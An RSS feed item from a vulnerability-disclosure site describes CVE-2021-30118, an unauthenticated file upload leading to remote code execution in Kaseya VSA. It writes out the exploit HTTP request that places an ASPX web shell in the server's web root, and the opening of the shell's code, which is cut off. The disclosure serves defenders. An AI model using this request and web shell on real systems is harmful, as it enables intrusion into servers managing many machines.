<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 05:58:20 +0000</lastBuildDate>
    <item>
      <title>CVE-2021-30118 — Unauthenticated Remote Code Execution in Kaseya VSA &lt; v9.5.5</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2021-30118</link>
      <description>&lt;p&gt;An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp;amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &amp;lt;%@ Page Language=&amp;#34;C#&amp;#34; Debug=&amp;#34;true&amp;#34; validateRequest=&amp;#34;false&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Web.UI.WebControls&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Diagnostics&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.IO&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data.SqlClient&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.AccessControl&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.Principal&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections.Generic&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections&amp;#34; %&amp;gt; &amp;lt;script runat=&amp;#34;server&amp;#34;&amp;gt; private const string password = &amp;#34;pass&amp;#34;; // The password ( pass ) private const string style = &amp;#34;dark&amp;#34;; // The style ( light / dark ) prot…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp;amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &amp;lt;%@ Page Language=&amp;#34;C#&amp;#34; Debug=&amp;#34;true&amp;#34; validateRequest=&amp;#34;false&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Web.UI.WebControls&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Diagnostics&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.IO&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Data.SqlClient&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.AccessControl&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Security.Principal&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections.Generic&amp;#34; %&amp;gt; &amp;lt;%@ Import namespace=&amp;#34;System.Collections&amp;#34; %&amp;gt; &amp;lt;script runat=&amp;#34;server&amp;#34;&amp;gt; private const string password = &amp;#34;pass&amp;#34;; // The password ( pass ) private const string style = &amp;#34;dark&amp;#34;; // The style ( light / dark ) prot…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2021-30118</guid>
    </item>
  </channel>
</rss>
